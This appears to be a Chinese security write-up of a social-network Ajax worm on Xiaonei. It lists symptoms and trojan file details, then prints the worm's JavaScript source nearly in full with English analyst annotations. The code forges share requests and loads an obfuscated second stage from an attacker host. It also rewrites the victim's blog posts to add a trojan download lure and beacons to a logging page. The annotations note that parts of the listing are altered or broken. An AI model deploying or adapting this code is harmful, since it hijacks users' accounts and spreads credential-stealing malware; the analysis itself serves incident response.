千橡国际 校内网 Ajax蠕虫大爆发!!!
传播方式:Ajax蠕虫强制性分享一篇“十二星男女生爱情大骗术(哇咧~天秤好准~!!!>_<)”(URL:http://blog请勿访问.xiaonei.com/GetEntry.do?id=369970722&owner=229461699)
配合钓鱼(Phishing)。
特征:自动在日志中加入“最后推荐一个东西: 发现了好软件,QQ千里眼,能够强制与任何QQ视频,能够强制加好友,强制聊天,迫使下线!下载地址”
威胁:初步诊断为QQ盗号工具
解决方案:暂无。(由于暂时无法得到JavaScript样本,所以无法解决。仅凭个人之力很难处理,需要校内网技术人员的配合)
替代方案:使用手机版校内网(因为手机端不支持Ajax,蠕虫脚本无法运行)
可执行文件MD5: 53d9b84d6a8aab02dfb94ea877f6e7ac
可执行文件大小:61,440 Bytes
开发语言:VB6.0
时间戳:0x4A20B8D0(若按Unix时间解读,即 2009-05-30 04:40:48 UTC)
Ajax蠕虫源代码
// Error suppression: killErrors() always returns true, and the assignment below is
// meant to register it as the page-wide error handler so script errors stay hidden
// from the person viewing the page.
// NOTE(review): in this listing the handler property is spelled with non-ASCII
// look-alike characters in place of the letter "o" (presumably substituted by the
// site that published the sample), so as printed it sets a differently named
// property. Treat the listing as not byte-exact with the live sample.
function killErrors() {return true;}
window.οnerrοr=killErrors;
// Browser-setting tampering: applies the legacy Internet Explorer "homepage"
// behavior to the element passed in and asks it to set the home page to a Baidu
// URL carrying a tn= parameter.
// NOTE(review): the tn= value looks like a partner/referral tag, which would make
// this a monetisation step — confirm.
// aaa: a DOM element; the function writes to its style and calls setHomePage on it.
function defaul_home(aaa){
aaa.style.behavior='url(#default#homepage)';
aaa.setHomePage('http://www.baidu.com/index.php?tn=haijin0212_pg');
}
// Calls defaul_home(aaa) nine times when window.xxx is not already 1, then sets
// window.xxx to 1 so that later calls do nothing.
// The only reference to hit() in this listing is the commented-out click hook that
// follows it, so the function appears to be inactive in this sample.
// aaa: the DOM element forwarded to defaul_home().
function hit(aaa){
// i is not declared, so it is a page-level global shared with the other loops below.
for(i=1;i<10;i++){
if(window.xxx!=1){
defaul_home(aaa);
}
}
window.xxx=1;
}
//document.all.blogpage.οnclick=Function("hit(document.all.blogpage)");
//----------------------------
// Shared state for the share-forging stage. mydata will hold the request body built
// by getinfo(). mylink points at the same host that the later stages of this script
// load from; getinfo() declares its own local mylink, so this global is not read there.
var mydata;
var mylink="http://love.avtupian.com/a/x/qiaoye.html";
// Runs immediately at load; the call works before the definition because function
// declarations are hoisted.
getinfo();
// Builds the body of a forged "share" request. Reads ten fields by element id
// (link, type, title, pic, fromno, fromname, fromuniv, albumid, summary, largeurl)
// and concatenates them into the global mydata as "post=" followed by a
// percent-encoded JSON object ("%7B%22link%22%3A%22" is {"link":" ). The closing
// quote and brace are not appended in this function.
// NOTE(review): the ids suggest the hosting page is expected to carry a share form —
// that page is not part of this listing, so confirm.
// Returns nothing; the result is left in mydata for appendjs().
function getinfo(){
// Local mylink shadows the global of the same name.
var mylink=document.getElementById("link").value;
var mytype=document.getElementById("type").value;
var mytitle=document.getElementById("title").value;
var mypic=document.getElementById("pic").value;
var myfromno=document.getElementById("fromno").value;
var myfromname=document.getElementById("fromname").value;
var myfromuniv=document.getElementById("fromuniv").value;
var myalbumid=document.getElementById("albumid").value;
// innerText rather than value: the summary is read as element text, not a form field.
var mysummary=document.getElementById("summary").innerText;
var mylargeurl=document.getElementById("largeurl").value;
// escape() is used for some fields and encodeURIComponent() for title, names and summary.
mydata='post=%7B%22link%22%3A%22'+escape(mylink);
mydata+='%22%2C%22type%22%3A%22'+escape(mytype);
mydata+='%22%2C%22title%22%3A%22'+encodeURIComponent(mytitle);
mydata+='%22%2C%22pic%22%3A%22'+escape(mypic);
mydata+='%22%2C%22fromno%22%3A%22'+escape(myfromno);
mydata+='%22%2C%22fromname%22%3A%22'+encodeURIComponent(myfromname);
mydata+='%22%2C%22fromuniv%22%3A%22'+encodeURIComponent(myfromuniv);
mydata+='%22%2C%22albumid%22%3A%22'+escape(myalbumid);
mydata+='%22%2C%22largeurl%22%3A%22'+escape(mylargeurl);
mydata+='%22%2C%22summary%22%3A%22'+encodeURIComponent(mysummary);
// NOTE(review): "g" is not defined anywhere in this listing; a regex literal was
// probably lost when the sample was published. Unless the host page defines g,
// this line throws as printed.
mydata=mydata.replace(g,'%2F');
}
// Stage set-up: appends a zero-size iframe pointing at share.xiaonei.com's
// ajaxProxy.html to the element with id "logo", then waits 2.6 s (presumably so the
// frame has loaded) before calling appendjs(). The string form of setTimeout is
// evaluated as code.
document.getElementById("logo").innerHTML+='<iframe name=do_it id=do_it src="http://share.xiaonei.com/ajaxProxy.html?ver=2" width=0 height=0></iframe>';
setTimeout("appendjs()",2600);
// Replaces the body of the "do_it" iframe with two elements:
//  - an <img> whose src (host r.dd plus a random query) is presumably chosen so that
//    the load fails; its error attribute evals a String.fromCharCode payload, which
//    decodes to a loader that creates a <script> element, points it at a file named
//    s.jpg under the same love.avtupian[.]com/a/x/ path, and appends it to <head>;
//  - a <div id=eer> carrying mydata, presumably read by that second-stage script.
// The second stage itself is not part of this listing. For detection, the script
// fetch disguised as a .jpg and the r.dd image request are network indicators.
// NOTE(review): the error attribute is printed with the same look-alike characters
// as the window handler assignment at the top of the listing, so this text is not
// byte-exact with the live sample. document.frames() is an Internet Explorer API.
function appendjs(){
document.frames("do_it").document.getElementsByTagName("body").item(0).innerHTML='<img src="http://r.dd/EE?E='+Math.random()+'" οnerrοr="eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,13,10,115,46,115,114,99,61,39,104,116,116,112,58,47,47,108,111,118,101,46,97,118,116,117,112,105,97,110,46,99,111,109,47,97,47,120,47,115,46,106,112,103,39,59,13,10,115,46,116,121,112,101,61,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,13,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,46,105,116,101,109,40,48,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,13,10))"><div id=eer name=eer>'+mydata+'</div>';
}
//===============================================================================================
// Blog-rewriting stage: globals shared between the functions that follow.
var mytitle;var mybody;var mytsc;var myid;var userurl;var guest;var targetblogurlid="0";
var myblogurl=new Array();var myblogid=new Array();var b_index;
var guest2;
// The href of the first link nested inside #logo is read, and the text after "?id="
// is kept as the logged-in visitor's id.
// NOTE(review): $ (and Ajax.Request further down) look like Prototype.js helpers
// supplied by the host page — confirm.
var visitorID=$("logo").firstChild.firstChild.href;
var IDs=visitorID.indexOf("?id=");
visitorID=visitorID.substring(IDs+4);
var mydomain=document.location.href;
var mydomaint=mydomain.indexOf("blog.xiaonei.com");
var myo=mydomain.indexOf(visitorID);
// Continue only when the current URL is on blog.xiaonei.com and does not contain the
// visitor's id — presumably meaning the visitor is reading someone else's blog.
if(mydomaint!=-1&&myo==-1){setTimeout("get_my_blogurl()",400);}
// Requests the visitor's own blog list (MyBlog.do) with an Ajax.Request GET.
// add_my_blogurl is registered for both completion and failure.
// Returns the request object.
function get_my_blogurl(){
var as=new Ajax.Request("http://blog.xiaonei.com/MyBlog.do",{method:"get",onComplete:add_my_blogurl,onFailure:add_my_blogurl});
return as;
}
// Parses the blog-list HTML in r.responseText and records up to ten entries:
// myblogurl[i] receives the text of each GetEntry.do link and myblogid[i] the value
// between "?id=" and "&owner". Scanning stops at the first miss, then control passes
// to get_my_testself().
// r: the response object handed over by Ajax.Request.
function add_my_blogurl(r){
var mybloglist=r.responseText;
var myurls;var blogids;var blogide;
// i is undeclared here and therefore a page-level global.
for(i=0;i<10;i++){
myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
//mybloglist=mybloglist.substring(myurls+10);
//myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
if(myurls!=-1){
// Advance to the link, skip past the opening quote, then cut at the closing quote.
mybloglist=mybloglist.substring(myurls);
myurls=mybloglist.indexOf('"');
mybloglist=mybloglist.substring(myurls+1);
myurls=mybloglist.indexOf('"');
// The end index myurls-1 leaves out the last character before the closing quote.
myblogurl[i]=mybloglist.substring(0,myurls-1);mybloglist=mybloglist.substring(myurls+1);
blogids=myblogurl[i].indexOf("?id=");blogide=myblogurl[i].indexOf("&owner");
myblogid[i]=myblogurl[i].substring(blogids+4,blogide);
//document.getElementById("blogContent").innerHTML+="<br><a href=eee.com >i="+i+";</a>"+myblogid[i];
}else{break;}
}
get_my_testself();
}
//-------------------------------------
// Picks the first of the visitor's entries that has not been modified yet. For each
// collected id it synchronously fetches the entry's edit page and looks for the
// string "skycn", which is part of the text add_my_form() appends; the first entry
// without it becomes the target and is passed to add_my_form().
// For responders, the same marker string identifies entries this sample has already
// rewritten.
function get_my_testself(){
targetblogurlid=0;
// i is undeclared here and therefore a page-level global.
for(i=0;i<myblogid.length;i++){
//var url="http://blog.xiaonei.com/GetEntry.do?id="+myblogid[i]+"&owner="+visitorID;
var url="http://blog.xiaonei.com/EditEntry.do?id="+myblogid[i];
var xhr2=createXMLHttpRequest();
if(xhr2){
// Third argument false: the request blocks until the edit page has been returned.
xhr2.open("GET",url,false);
xhr2.send();guest2=xhr2.responseText;
}
var mycheckit=guest2.indexOf("skycn");
if(mycheckit==-1){targetblogurlid=myblogid[i];b_index=i;break;}
}
if(targetblogurlid!=0){add_my_form(targetblogurlid);}
}
//---------------------------------------------------------------add--form
// Rebuilds the chosen entry with the lure appended. Works on the edit-page HTML left
// in guest2: extracts the title (the value following name="title") and the body (the
// text up to </textarea> following name="body"), appends a paragraph advertising a
// download link, URI-encodes both and calls myxiugai() to save them.
// r: the target entry id; it is not used inside the function (the global
// targetblogurlid is what myxiugai() sends).
// NOTE(review): the replace chains below map characters to themselves as printed,
// presumably because HTML entity names were decoded when the sample was published.
// Treat them as not byte-exact with the live sample.
function add_my_form(r){
guest=guest2;
var texts=guest.indexOf('name="title"');
guest=guest.substring(texts);
var titles=guest.indexOf('value="');
var titlee=guest.indexOf('" />');
mytitle=guest.substring(titles+7,titlee);
mytitle=mytitle.replace(/&/g,'&').replace(/"/g,'/"').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"');
mytitle=encodeURI(mytitle);
guest=guest.substring(titlee);
var bodys=guest.indexOf('name="body"');
var bodye=guest.indexOf('</textarea>');
// Fixed offset of 30 characters past name="body": assumes a particular markup layout.
mybody=guest.substring(bodys+30,bodye);
mybody=mybody.replace(/&/g,'&').replace(/"/g,'/"').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"');
// The appended paragraph is the visible symptom described in the write-up and also
// contains the "skycn" marker that get_my_testself() checks for.
mybody+='<p><br>最后推荐一个东西:<br><br>发现了好软件,QQ千里眼,能够强制与任何QQ视频,能够强制加好友,强制聊天,迫使下线!<br>下载地址:<a href="http://tan.itwenba.cn/qq/QQqianliyan.rar" target=_blank >天空下载中心:skycn</a></p>';
mybody=encodeURI(mybody);
myxiugai();
}
// Submits the modified entry: a synchronous form-encoded POST to EditEntry.do with
// the extracted title, the body plus lure, the visitor's id as owner and the target
// entry id. Because the request is issued from a page the victim is viewing, it is
// presumably sent with the victim's session.
// The field list contains no per-request token; whether the server expected one
// cannot be told from this listing.
function myxiugai(){
userurl="http://blog.xiaonei.com/EditEntry.do";
var fdata="title="+mytitle+"&body="+mybody+"&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=0&pic_path=&owner="+visitorID+"&relative_optype=&id="+targetblogurlid;
var xhr=createXMLHttpRequest();
// NOTE(review): "g" is undefined in this listing (the same artifact appears in
// getinfo()); the original pattern was probably lost in publication.
fdata=fdata.replace(g,'%2F');
// Strip encoded tabs and CR/LF pairs from the body before sending.
fdata=fdata.replace(/%09/g,'');
fdata=fdata.replace(/%0D%0A/g,'');
if(xhr){
xhr.open("POST",userurl,false);
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.send(fdata);
}
}
//--------------------------------
/**
 * Generic cross-browser request-object factory used by the rest of the sample.
 *
 * Uses the native XMLHttpRequest when the window exposes one; otherwise walks a
 * list of legacy ActiveX ProgIDs in order and returns the first that instantiates.
 *
 * @returns {Object|null} a request object, or null when nothing could be created.
 */
function createXMLHttpRequest(){
  if (window.XMLHttpRequest) {
    return new XMLHttpRequest();
  }
  // Candidate ProgIDs, tried in this order.
  var progIds = ['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];
  for (var idx = 0; idx < progIds.length; idx++) {
    try {
      return new ActiveXObject(progIds[idx]);
    } catch (ignored) {
      // This ProgID is unavailable; fall through to the next one.
    }
  }
  return null;
}
//---------------------------------------
// Beacon: 200 ms after load, myshua() appends a zero-size iframe that loads ip.asp
// from love.avtupian[.]com into the element with id "optiondropdownMenu".
// NOTE(review): the file name suggests visitor/IP logging by whoever runs that host —
// not verifiable from this listing. The request is a network indicator for pages
// carrying this script. insertAdjacentHTML with "beforeend" adds the frame as the
// element's last child.
setTimeout("myshua()",200);
function myshua(){
document.getElementById("optiondropdownMenu").insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://love.avtupian.com/ip.asp'></iframe>");
}